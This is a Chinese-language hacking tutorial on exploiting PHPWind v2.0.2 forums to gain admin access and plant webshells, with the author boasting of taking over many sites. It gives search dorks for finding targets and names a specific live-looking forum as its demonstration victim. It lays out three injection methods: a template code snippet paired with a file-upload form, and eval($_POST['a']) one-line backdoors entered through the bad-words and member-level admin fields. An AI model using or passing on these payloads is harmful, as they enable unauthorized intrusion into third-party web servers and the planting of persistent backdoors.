电脑技术学习

phpwind漏洞利用终结篇

dn001

这漏洞出了也有段时间了..开始在Q里..三少哥哥先发了漏洞利用工具给我..然后自己试着传上了PHP马..然后枫三少又告诉我一种方法...拿下了不少站...当晚准备把文章赶写出来..太困了就没继续写...这几天家里发生的事太多..一直也没时间写...最近网上也出了文章和教程,我看了下都不是很完整..今天我就来做个完结篇的..算是庆祝我升黑基管理员把....

首先在baidu或google搜索Powered by PHPWind v2.0.2 或Powered by PHPWind v2.0.2, PLUS V2.1

为了不耽误大家时间..我提前找了一个
http://www.arebbs.com/先注册一个...注册过程我想大家都会的把..。我已经注册好了..登陆.
然后用玄猫写的phpwind提升漏洞测试程序提权.
提示失败..但也不要灰心...我们来看下..看..多出了一个"系统设置 "
我在测试的时候.发现好几个站都是这样,.但结果都是成功的...下面我们继续拿webshell
将介绍三种方法给大家

请将此文件(template/baobao/header.htm)属性设置为 777 可写模式
汗了...好象管理员发现了..把这个设置了不可写...
大家可以找别的站试下...把方法说下
方法一.
进入后台,找到“风格模板设置”
在原有的代码前面加入以下代码:
<style type='text/css'>
</style>
<!--
EOT;
?>-->
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
<!--
<?php
print <<<EOT
-->

保存后,木马地址为当前目录下的faq.php

在本机用如下表单进行提交:
<form ENCTYPE="multipart/form-data" ACTION="http://目标服务器/faq.php"
METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
上传成功后的木马存在论坛目录下
直接访问就行!

假设现在的这个是可以的...
这个是我以前搞的..我试下还能用不..看样是不行了..大家只要把这里换一下..然后就可以本地上传任意文件了..前提是次目录是可写的...如果不可写..我们还可以利用第二种方法..


方法二.

首先用EXP进入后台,在后台里执行如下过程:
新增 不良词语写 a']='aa';eval($_POST['a']);// 替换为那里可以写随便写..我这里替换了11
而后得到一个shell地址为 http://www.arebbs.com/data/bbscache/wordsfb.php
写如成功后wordsfb.php文件的代码就成了

<?php
$wordsfb['a']='aa';eval($_POST['a']);//']='1';
?>

然后用lanker微型PHP后门客户2.0正式版.htm上传一个新PHP马...密码是a
这样我们就得到webshell了...

本程序目录..我们来传个马看下.hb.php是angel写的PHP马...出现OK就是上传成功...我们访问下看看
http://www.arebbs.com/data/bbscache/hb.php
密码www.ciker.org登陆/....就这么简单...:)

下面还有一个方法是在网上看到的..也介绍下把..

方法三.
用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a';eval($_POST['a']);//
升级点数依然可以随意写。

而后得到一个shell地址为
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门。

接下来的就跟方法二要做的一样了..

我们试下有没成功.密码同样是a
晕...
难道被发现了?
估计是封了我IP
webshell可以访问...看样是把我IP封了..刚才试的时候...出了错误..

感觉是
升级图片号写a';eval($_POST['a']);//
这句问题.如果大家在测试时候也出现和我同样的错误
把a';eval($_POST['a']);//这个改为
a']='aa';eval($_POST['a']);//...我就不费时间去找别的站测试了...如果大家有好的发现欢迎与我交流

标签: